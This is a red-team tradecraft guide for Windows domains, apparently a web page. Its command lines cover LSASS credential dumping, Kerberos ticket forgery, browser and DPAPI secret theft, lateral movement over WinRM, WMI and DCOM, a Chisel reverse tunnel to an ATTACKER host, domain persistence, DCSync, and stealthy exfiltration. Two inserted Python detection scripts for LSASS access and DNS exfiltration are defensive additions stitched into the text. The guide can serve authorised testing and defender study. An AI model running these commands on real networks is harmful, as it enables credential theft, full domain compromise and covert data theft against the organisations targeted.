# Red Team Tradecraft

Advanced techniques for credential harvesting, lateral movement, and achieving objectives while maintaining stealth and OPSEC.
## Credential Access

### In-Memory Credential Harvesting

> **Tip:** Avoid touching disk. Execute tools in memory to reduce forensic artifacts.
```bash
# Execute-assembly for in-memory execution
# Sliver
sliver > execute-assembly /path/to/SharpKatz.exe --Command logonpasswords
# Cobalt Strike
beacon> execute-assembly /path/to/Rubeus.exe kerberoast /format:hashcat

# Common credential tools:
# - SharpKatz (Mimikatz in C#)
# - Rubeus (Kerberos attacks)
# - SharpDPAPI (DPAPI secrets)
# - SharpChromium (Browser creds)
# - Seatbelt (Enumeration)
```

### LSASS Credential Extraction
```bash
# Method 1: MiniDump via comsvcs.dll (common EDR detection)
rundll32.exe C:\windows\system32\comsvcs.dll, MiniDump [LSASS_PID] C:\temp\lsass.dmp full

# Method 2: Nanodump (stealthier)
# Creates minidump using syscalls, avoids hooks
nanodump.x64.exe --write C:\temp\lsass.dmp --valid

# Method 3: PPLdump (if Protected Process)
# Dumps LSASS even when running as PPL
PPLdump.exe [LSASS_PID] lsass.dmp

# Method 4: Duplicating LSASS handle
# Get handle from another process
HandleKatz.exe

# Parse dump offline
pypykatz lsa minidump lsass.dmp
mimikatz # sekurlsa::minidump lsass.dmp
```

### Kerberos Attacks
```bash
# Kerberoasting (target high-value SPNs)
execute-assembly Rubeus.exe kerberoast /user:sqlservice /format:hashcat /outfile:hashes.txt

# AS-REP Roasting
execute-assembly Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt

# Golden Ticket (requires krbtgt hash)
execute-assembly Rubeus.exe golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:HASH /ptt

# Silver Ticket (service-specific)
execute-assembly Rubeus.exe silver /service:cifs/server.corp.local /user:Administrator /rc4:HASH /ptt

# Overpass-the-Hash
execute-assembly Rubeus.exe asktgt /user:admin /rc4:HASH /ptt
```

### DPAPI Secrets
```bash
# DPAPI protects:
# - Browser passwords
# - Windows Credential Manager
# - RDP saved creds
# - VPN credentials

# Extract DPAPI secrets
execute-assembly SharpDPAPI.exe credentials /target:C:\Users

# Browser credentials
execute-assembly SharpChromium.exe logins
execute-assembly SharpWeb.exe all

# Credential Manager
execute-assembly SharpDPAPI.exe credentials
```

## Lateral Movement
### Technique Comparison

| Technique | Detection Risk | Requirements |
|---|---|---|
| PSExec | High | Admin, SMB |
| WMI | Medium | Admin, RPC |
| WinRM | Low-Med | WinRM enabled |
| DCOM | Low | Admin, RPC |
| SSH | Low | SSH enabled |
| RDP | Medium | RDP enabled |
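Added defender-side example, not code from the page or from any tool it lists: a Python scan over constructed Sysmon-style process-create (EventID 1) and process-access (EventID 10) events. It covers the comsvcs.dll MiniDump and LSASS-handle indicators from the LSASS Credential Extraction section as well as the host-process footprints that sit behind the detection-risk column in the table above. The flattened key=value log format, the parent-process list and the access-mask check are assumptions made for this example.

```python
import re

# Constructed Sysmon-style events (EventID 1 = process create, 10 = process access);
# sample lines written for this example, not real telemetry.
SAMPLE_LOG = """\
EventID=1 Image=C:\\Windows\\System32\\rundll32.exe CommandLine="rundll32.exe C:\\windows\\system32\\comsvcs.dll, MiniDump 712 C:\\temp\\lsass.dmp full" ParentImage=C:\\Windows\\System32\\cmd.exe
EventID=10 SourceImage=C:\\Users\\bob\\tool.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1FFFFF
EventID=10 SourceImage=C:\\Windows\\System32\\csrss.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1400
EventID=1 Image=C:\\Windows\\System32\\cmd.exe CommandLine="cmd.exe /c whoami" ParentImage=C:\\Windows\\System32\\wbem\\WmiPrvSE.exe
EventID=1 Image=C:\\Windows\\System32\\cmd.exe CommandLine="cmd.exe /c whoami" ParentImage=C:\\Windows\\System32\\wsmprovhost.exe
EventID=1 Image=C:\\Windows\\PSEXESVC.exe CommandLine=C:\\Windows\\PSEXESVC.exe ParentImage=C:\\Windows\\System32\\services.exe
EventID=1 Image=C:\\Windows\\System32\\notepad.exe CommandLine=notepad.exe ParentImage=C:\\Windows\\explorer.exe
"""

PROCESS_VM_READ = 0x10  # access right any minidump of LSASS needs (assumed check)
# Host processes that spawn children only for remote execution (WMI, WinRM, MMC20 DCOM)
REMOTE_EXEC_PARENTS = {"wmiprvse.exe": "WMI", "wsmprovhost.exe": "WinRM", "mmc.exe": "DCOM (MMC20)"}

def parse_event(line):
    """Turn 'Key=value Key="quoted value"' into a dict with quotes stripped."""
    return {k: v.strip('"') for k, v in re.findall(r'(\w+)=("[^"]*"|\S+)', line)}

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify(ev):
    """Return a finding label for one event, or None if nothing matched."""
    if ev.get("EventID") == "1":
        cmd = ev.get("CommandLine", "").lower()
        if "comsvcs.dll" in cmd and "minidump" in cmd:
            return "LSASS dump via comsvcs.dll MiniDump"
        if basename(ev.get("Image", "")) == "psexesvc.exe":
            return "Lateral movement: PsExec service binary"
        parent = basename(ev.get("ParentImage", ""))
        if parent in REMOTE_EXEC_PARENTS:
            return f"Lateral movement: child of {REMOTE_EXEC_PARENTS[parent]} host process"
    elif ev.get("EventID") == "10":
        access = int(ev.get("GrantedAccess", "0"), 16)
        if basename(ev.get("TargetImage", "")) == "lsass.exe" and access & PROCESS_VM_READ:
            return "LSASS handle opened with PROCESS_VM_READ"
    return None

def scan(log_text):
    """Return [(finding, offending process)] for every suspicious line."""
    findings = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        hit = classify(ev)
        if hit:
            findings.append((hit, ev.get("Image") or ev.get("SourceImage")))
    return findings
```

explorer.exe as a parent (the ShellWindows DCOM path) is deliberately not flagged on its own, since it spawns almost everything an interactive user runs.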
### WinRM Movement

```powershell
# PowerShell Remoting (WinRM)
$cred = Get-Credential
Enter-PSSession -ComputerName TARGET -Credential $cred

# Invoke-Command for single commands
Invoke-Command -ComputerName TARGET -Credential $cred -ScriptBlock {whoami}

# Sliver
sliver > psexec TARGET -u admin -p password # Creates service
sliver > winrm TARGET -u admin -p password # Uses WinRM (stealthier)

# Cobalt Strike
beacon> jump winrm TARGET LISTENER
```

### WMI Movement
```bash
# WMI process creation
wmic /node:TARGET process call create "cmd.exe /c whoami > C:\result.txt"

# PowerShell WMI
$cred = Get-Credential
Invoke-WmiMethod -ComputerName TARGET -Credential $cred -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c ..."

# Impacket wmiexec
wmiexec.py domain/user:password@TARGET

# CrackMapExec
crackmapexec wmi TARGET -u user -p password -x "whoami"
```

### DCOM Movement
```powershell
# DCOM (Distributed COM) lateral movement
# Less commonly monitored than WMI/PSExec

# ShellWindows object
$com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39', "TARGET")
$obj = [System.Activator]::CreateInstance($com)
$obj.Document.Application.ShellExecute("cmd.exe", "/c whoami > C:\out.txt")

# Other DCOM objects:
# ShellBrowserWindow
# MMC20.Application
# Outlook.Application

# Impacket dcomexec
dcomexec.py domain/user:password@TARGET
```

## Pivoting
### SOCKS Proxy

```bash
# Sliver SOCKS proxy
sliver > socks5 start -P 1080

# Use with proxychains
# /etc/proxychains.conf: socks5 127.0.0.1 1080
proxychains nmap -sT 10.10.10.0/24

# Cobalt Strike
beacon> socks 1080

# Chisel
# Server (attacker)
chisel server -p 8080 --reverse
# Client (target)
chisel client ATTACKER:8080 R:socks
```

### Port Forwarding
```bash
# Sliver port forward
sliver > portfwd add -b 127.0.0.1:8080 -r 10.10.10.5:80
# Now access 10.10.10.5:80 via localhost:8080

# SSH tunneling
ssh -L 8080:10.10.10.5:80 user@jumphost

# Reverse port forward (target to attacker)
ssh -R 9000:localhost:8080 user@attacker

# Ligolo-ng (modern alternative)
# Agent on target, proxy on attacker
# Creates virtual interface for direct access
```

## Persistence
### Stealthy Persistence Methods

```text
# WMI Event Subscription (survives reboots)
# Creates filter, consumer, and binding
# Executes when event condition is met

# Golden Ticket (domain persistence)
# Requires krbtgt hash
# Valid for 10 years by default
# Survives password resets (except krbtgt)

# Skeleton Key (in-memory DC backdoor)
# Master password works for any account
# Lost on reboot, must reapply

# AdminSDHolder
# Modifies protected AD objects
# ACL propagates every 60 minutes

# DCSync via ACL abuse
# Add replication rights to controlled account
# Persistent DCSync capability
```

### Certificate-Based Persistence
```bash
# ADCS abuse for persistence
# Request certificate for target user
# Certificate valid for years

# Certipy
certipy req -u user@corp.local -p password -target CA_SERVER -ca CA_NAME -template User
# Use certificate for authentication
certipy auth -pfx user.pfx -dc-ip DC_IP

# Shadow Credentials
# Add certificate to msDS-KeyCredentialLink
# Can authenticate as target user

# Whisker (add shadow credential)
Whisker.exe add /target:admin /domain:corp.local
```

## Domain Escalation
### Attack Paths

```mermaid
flowchart TD
    A[Initial Access] --> B[Local Admin]
    B --> C[Credential Harvest]
    C --> D[Lateral Movement]
    D --> E[High Value Target]
    E --> F[Domain Admin]
    F --> G[Domain Dominance]
    style A fill:#ff6b6b,stroke:#000,color:#000
    style F fill:#a855f7,stroke:#000,color:#000
    style G fill:#00ff00,stroke:#000,color:#000
```
```bash
# Common escalation paths:

# 1. Kerberoast service account
GetUserSPNs.py -request -dc-ip DC corp.local/user:pass
# Crack hash -> service account password

# 2. ADCS misconfiguration
certipy find -vulnerable -u user@corp.local -p pass
# Exploit template for domain admin cert

# 3. Delegation abuse
# Find unconstrained delegation
Get-DomainComputer -Unconstrained
# Coerce authentication to capture TGT

# 4. ACL abuse (via BloodHound)
# GenericAll, WriteDACL, ForceChangePassword
# Chain permissions to domain admin

# 5. GPO abuse
# Modify GPO that applies to domain admins
# Add local admin, scheduled task, etc.
```

### DCSync
```bash
# DCSync - replicate credentials from DC
# Requires: DS-Replication-Get-Changes + DS-Replication-Get-Changes-All

# Mimikatz
lsadump::dcsync /user:Administrator /domain:corp.local

# Impacket
secretsdump.py corp.local/admin:password@DC_IP -just-dc-ntlm
# Specific user
secretsdump.py corp.local/admin:password@DC_IP -just-dc-user Administrator
# Get krbtgt for Golden Ticket
secretsdump.py corp.local/admin:password@DC_IP -just-dc-user krbtgt
```

## Data Exfiltration
```text
# Low and slow exfiltration
# - Small chunks over time
# - Use allowed protocols
# - Blend with normal traffic

# DNS exfiltration
# Encode data in DNS queries
# Very slow but hard to detect

# HTTPS POST
# Mimic legitimate application traffic
# Use categorized domains

# Cloud services
# Upload to OneDrive, Dropbox, etc.
# If allowed by organization

# Encrypted archives
# Compress and encrypt before exfil
# Password-protect sensitive data
```
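Added defender-side example, not from the page: a Python profiler over a constructed DNS query log that flags registered domains whose subdomains look like encoded payload chunks (many unique, long, high-entropy labels), which is the footprint the "DNS exfiltration" note above describes. The `<client> <qname>` log format, the last-two-labels domain split and the thresholds are assumptions for this example.

```python
import math
from collections import defaultdict

# Constructed DNS query log ("<client> <qname>"), written for this example; the
# files-sync.test labels are base32-looking filler, not real traffic.
SAMPLE_DNS_LOG = """\
10.0.0.5 www.example.com
10.0.0.5 cdn.example.com
10.0.0.7 mfrggzdfmztwq2lknnwg23tpobyxe43u.1.files-sync.test
10.0.0.7 ov3ho6dzpiqgc4tdmrswmz3infvgw3dn.2.files-sync.test
10.0.0.7 nbsgy3dpfyqhi2dfebwgk43tmfts433i.3.files-sync.test
10.0.0.7 k5vgc3tuebzwk3tpobsw4ic2n5zsaylo.4.files-sync.test
10.0.0.5 mail.example.com
10.0.0.9 login.intranet.test
"""

def shannon_entropy(s):
    """Bits per character; encoded data scores well above ordinary hostnames."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())

def split_qname(qname):
    """Return (subdomain part, registered domain). Assumes the registered domain
    is the last two labels; production code should use the public suffix list."""
    labels = qname.lower().rstrip(".").split(".")
    return ".".join(labels[:-2]), ".".join(labels[-2:])

def profile(log_text):
    """Per registered domain: unique subdomains, mean length, mean entropy."""
    subs = defaultdict(set)
    for line in log_text.splitlines():
        _, qname = line.split()
        sub, domain = split_qname(qname)
        if sub:
            subs[domain].add(sub)
    return {d: {"unique": len(s),
                "mean_len": sum(map(len, s)) / len(s),
                "mean_entropy": sum(map(shannon_entropy, s)) / len(s)}
            for d, s in subs.items()}

def suspicious_domains(log_text, min_unique=4, min_len=20, min_entropy=3.5):
    """Domains whose subdomains look like payload chunks rather than hostnames."""
    return sorted(d for d, p in profile(log_text).items()
                  if p["unique"] >= min_unique
                  and p["mean_len"] >= min_len
                  and p["mean_entropy"] >= min_entropy)
```

Query volume per client and per time window is the other signal worth adding in practice, since the "low and slow" variant above keeps each individual label unremarkable.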